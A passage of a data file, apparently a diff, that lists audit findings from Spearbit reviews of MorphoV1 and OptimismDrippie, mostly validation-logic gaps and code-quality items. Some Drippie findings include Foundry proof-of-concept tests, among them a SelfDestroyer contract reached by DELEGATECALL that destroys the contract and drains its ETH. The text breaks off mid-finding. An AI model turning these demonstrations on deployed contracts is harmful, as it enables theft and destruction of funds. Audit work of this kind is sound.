"Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave liquidate validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implements the liquidate function as a mix of repay + supply operations on Aave executed inside _unsafeRepayLogic where needed withdraw + borrow operations on Aave executed inside _unsafeWithdrawLogic where needed From _unsafeRepayLogic (repay + supply on pool where needed) Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed Morpho is not checking that the Aave borrowAsset has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert 16 Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to borrow that amount to Aave would make the whole tx revert From _unsafeWithdrawLogic (withdraw + borrow on pool where needed) Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCol- lateral Morpho is not checking that the Aave collateralAsset has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave repay validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the repay function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to supply that amount to Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave withdraw validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the withdraw function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave borrow validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the borrow function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false (check done by Aave on the borrow operation), users could be able to borrow in P2P even if the borrow is paused on Aave (isFrozen == true) because Morpho would only call the aave.withdraw (where the frozen flag is not checked) Morpho do not check if market is active (would borrowingEnabled == false if market is not active?) Morpho do not check if market is frozen (would borrowingEnabled == false if market is not frozen?) Morpho do not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave supply validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the supply function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false, users could be able to supply in P2P even if the supply is paused on Aave (isFrozen == true) because Morpho would only call the aave.repay (where the frozen flag is not checked) Morpho is not checking if remainingToSupply.rayDiv( poolIndexes[_poolToken].poolSupplyIndex ) === 0. Trying to supply that amount to Aave would make the whole tx revert 19 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Morpho should avoid creating a new market when the underlying Aave market is frozen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In the current implementation of Aave MorphoGovernance.createMarket the function is only check- ing if the AToken is in active state. Morpho should also check if the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction).", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Compound liquidate validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both logic, we have noticed that there are some differences between the logic Morpho does not check Compound seizeGuardianPaused because it is not implementing a \"real\" liquidate on compound, but it's emulating it as a \"repay\" + \"withdraw\". Morpho should anyway monitor off-chain when the value of seizeGuardianPaused changes to true. Which are the scenarios for which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? [Open question] Should Morpho pause liquidations when the seizeGuardianPaused is true? Morpho is not reverting if msg.sender === borrower Morpho does not check if _amount > 0 Compound revert if amountToSeize > userCollateralBalance, Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance) 20 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "repayLogic in Compound PositionsManagershould revert if toRepay is equal to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of repayLogic is correctly reverting if _amount == 0 but is not reverting if toRepay == 0. The value inside toRepay is given by the min value between _getUserBorrowBalanceInOf(_- poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Compound supply validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound is handling ERC20 tokens that could have transfer fees, Morpho is not doing it right now, see\"ERC20 with transfer's fee are not handled by PositionManager\". Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in the P2P. Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the next future, probably Morpho should not allow users to provide collateral for such a market. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider creating a documentation that covers all the Morpho own flags, lending protocol's flags and how they interact/override each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic to map 1:1 the implementation of the underlying protocol validation. There are some examples also where Morpho has decided to override some of their own internal flags For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic even if a Morpho market has been flagged as \"deprecated\" (user can be liquidated without being insolvent) the liquidator would not be able to liquidate the user if the liquidation logic has been paused.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Missing natspec or typos in natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "- Updated the natspec updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRate- Stored()\" Updated the natspec _updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRateStored()\" Updated the natspec for event MarketCreated replacing \"_poolToken\" with \"_p2pIndexCursor\"", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Removed unused \"named\" return parameters from functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Some functions in the codebase are defining \"named\" functions parameter that are not used explicitly inside the code. This could lead to future changes to return wrong values if the \"explicit return\" statement is removed and the function returns the \"default\" values (based on the variable type) of the \"named\" parameter.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider merging the code of CompoundMath libraries and use only one", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current codebase uses libraries/CompoundMath.sol but there's already an existing solidity library with the same name inside the package @morpho-dao/morpho-utils For better code clarity, consider merging those two libraries and only importing the one from the external pack- age. Be aware that the current implementation inside the @morpho-dao/morpho-utils CompoundMath mul and div function uses low-level yul and should be tested, while the library used right now in the code use \"high level\" solidity. the", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider reverting the creation of a deprecated market in Compound", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Compound has a mechanism that allows the Governance to set a specific market as \"deprecated\". Once a market is deprecated, all the borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) a market. In the current version of MorphoGovernance.createMarket, Morpho governance is not checking whether a market is already deprecated on compound before entering it and creating a new Morpho-market. This would allow a Morpho user to possibly supply or borrow on a market that has been already deprecated by compound.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Document HeapOrdering", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho uses a non-standard Heap implementation for their Aave P2P matching engine. The im- plementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once the _maxSortedUsers is reached, it halves the size of the heap, cutting the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider removing the Aave-v2 reward management logic if it is not used anymore", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if not at all) consider removing the code that currently is handling all the logic behind claiming rewards from the Aave lending pool for the supplied/borrow assets. Removing that code would make the codebase cleaner, reduce the attack surface and possibly revert in case some of the state variables are incorrectly miss configured (rewards management on Morpho is activated but Aave is not distributing rewards anymore).", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Avoid shadowing state variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational aave-" + ] + }, + { + "title": "Governance setter functions do not check current state before updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, or does not allow unnecessary state changes.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Emit event for amount of dust used to cover withdrawals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded. Use this value as part of your overall balance accounting to verify everything adds up.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Break up long functions into smaller composable functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "A few functions are 100+ lines of code which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions which would make it easier to grasp the logic of the function, while also enabling you to easily unit test the smaller functions.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Remove unused struct members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. These should be removed to increase code readability.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Remove unused struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "There is an unused struct BorrowAllowedVars. This should be removed to improve code readability.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "No validation check on prices fetched from the oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Currently in the liquidateLogic function when fetching the borrowedTokenPrice and collateral- Price from the oracle, the return value is not validated. This is due to the fact that the underlying protocol does not do this check either, but the fact that the underlying protocol does not do validation should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound PositionsManager.sol here so for code consistency, it should also be done in Aave-v2.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "onBehalf argument can be set as the Morpho protocols address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When calling the supplyLogic function, currently the _onBehalf argument allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause for user error and should not be allowed.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "maxSortedUsers has no upper bounds validation and is not the same in Compound/Aave-2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In MorphoGovernance.sol, the maxSortedUsers function has no upper bounds limit put in place. The maxSortedUsers is the number of users to sort in the data structure. Also, while this function has the MaxSorte- dUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider adding the compound revert error code inside Morpho custom error to better track the revert reason", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted, and instead an error code (code !== 0) is returned. Morpho correctly reverts with a custom error when this happens, but is not reporting the error code returned by Compound. By tracking, as an event parameter, the error code, Morpho could better monitor when and why interactions with Compound are failing.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "liquidationThreshold variable name can be misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in \"value units\" like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Users can be liquidated on Morpho at any time when the deprecation flag is set by governance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Governance can set a deprecation flag on Compound and Aave markets, and users on this mar- ket can be liquidated by anyone even if they're sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Refactor _computeP2PIndexes to use InterestRateModel's functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Permitting Multiple Drip Calls Per Block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "state.config.interval is 0. We are currently unaware of use cases where this is desirable. The inline comments correctly note that reentrancy is possible and permitted when Reentrancy is one risk, flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion. A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Medium Risk" + ] + }, + { + "title": "Version Bump to Latest", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "During the review, a new version of solidity was released with an important bugfix.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "DOS from External Calls in Drippie.executable / Drippie.drip", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception causing the entire drip to fail. The severity is low beacuse in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Use call.value over transfer in withdrawETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background.) While useful to use transfer in some cases (such as sending to EOA or contract which does not process data in the fallback or receiver functions), this particular contract does not benefit: withdrawETH is already owner gated and is not at risk of reentrancy as owner already has permission to drain the contracts ether in a single call should they choose.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Input Validation Checks for Drippie.create", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drippie.create does not validate input potentially leading to unintended results. The function should check: _name is not an empty string to avoid creating drip that would be able to read on frontend UI. _config.dripcheck should not be address(0) otherwise executable will always revert. _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed. DripAction.target should not be address(0) to prevent burning ETH or interacting with the zero address during drips execution.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Ownership Initialization and Transfer Safety on Owned.setOwner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Scenario 1 Drippie allows the owner to be both initialized and set to address(0). If this scenario happens nobody will be able to manage the Drippie contract, thus preventing any of the following operations: Creating a new drip Updating a drips status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable. This scenario where the owner can be set to address(0) can occur when address(0) is passed to the construc- tor or setOwner. Scenario 2 owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Unchecked Return and Handling of Non-standard Tokens in AssetReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The current AssetReceiver contract implement \"direct\" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: revert on failed transfers adhere to ERC20 interface (i.e. no return value) An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of ETH, ERC20 and ERC721 tokens but they do not check that the receiver address is not address(0). By not doing so, those functions allow to: Burn ETH if sent to address(0). Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allow tokens to be burned via transfer (For example, Solmates ERC20 allow that, OpenZeppelin instead will revert if the recipient is address(0)). Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allow tokens to be burned via trans- ferFrom (For example, both Solmate and OpenZeppelin implementations prevent to send the _id to the address(0) but you dont know if that is still true about custom ERC721 contract that does not use those libraries).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver contains the function withdrawERC721 that allow the owner to withdraw ERC721 tokens. As stated in the EIP-721, the safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetRe- ceiver) will revert if the target contract (AssetReceiver in this case) is not implementing onERC721Received and returning the expected value bytes4(keccak256(\"onERC721Received(address,address,uint256,bytes)\")).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Transactor contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions are executing delegatecall and call without emitting any events. Because of the general- purpose nature of these function, it would be considered a good security measure to emit events to track the functions usage. Those events could be then used to monitor and track usage by external monitoring services.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether execution was successful or not. By not implementing such check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not transferred to the _target. Test example showcasing the issue: contract Useless { // A contract that have no functions // No fallback functions // Will not accept ETH (only from selfdestruct/coinbase) } function test_transactorCALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them 8 (success, ) = drippie.CALL{value: 1 ether}(address(useless), \"\", 100000, 1 ether); assertEq(success, false); vm.prank(deployer); // Perform a `call` to a not existing target's function (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000, 1 ether); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! } function test_transactorDELEGATECALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `delegatecall` to a contract that cannot receive them (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), \"\", 100000); assertEq(success, false); vm.prank(deployer); // Perform a `delegatecall` to a not existing target's function (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL function that allow the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: Scenario 1 A malicious target contract could selfdestruct the Transactor contract and as a consequence the contract that is inheriting from Transactor. Test example showcasing the issue: 9 contract SelfDestroyer { function destroy(address receiver) external { selfdestruct(payable(receiver)); } } function test_canOwnerSelftDestructDrippie() public { // Assert that Drippie exist assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); assertGt(getContractSize(address(drippie)), 0); // set it to active vm.prank(deployer); drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); // fund the drippie with 1 ETH vm.deal(address(drippie), 1 ether); uint256 deployerBalanceBefore = deployer.balance; uint256 drippieBalanceBefore = address(drippie).balance; // deploy the destroyer SelfDestroyer selfDestroyer = new SelfDestroyer(); vm.prank(deployer); drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature(\"destroy(address)\", deployer), gasleft()); ,! uint256 deployerBalanceAfter = deployer.balance; uint256 drippieBalanceAfter = address(drippie).balance; // assert that the deployer has received the balance that was present in Drippie assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore); assertEq(drippieBalanceAfter, 0); // Weird things happens with forge // Because we are in the same block the code of the contract is still > 0 so // Cannot use assertEq(getContractSize(address(drippie)), 0); // Known forge issue // 1) Forge resets storage var to 0 after self-destruct (before tx ends) 2654 -> https://github.com/foundry-rs/foundry/issues/2654 // 2) selfdestruct has no effect in test 1543 -> https://github.com/foundry-rs/foundry/issues/1543 assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); ,! } Scenario 2 The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping. By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing drips status: Activating an archived drip Deleting a drip by changing the status to NONE (this allows the owner to override entirely the drip by calling again create) Switching an 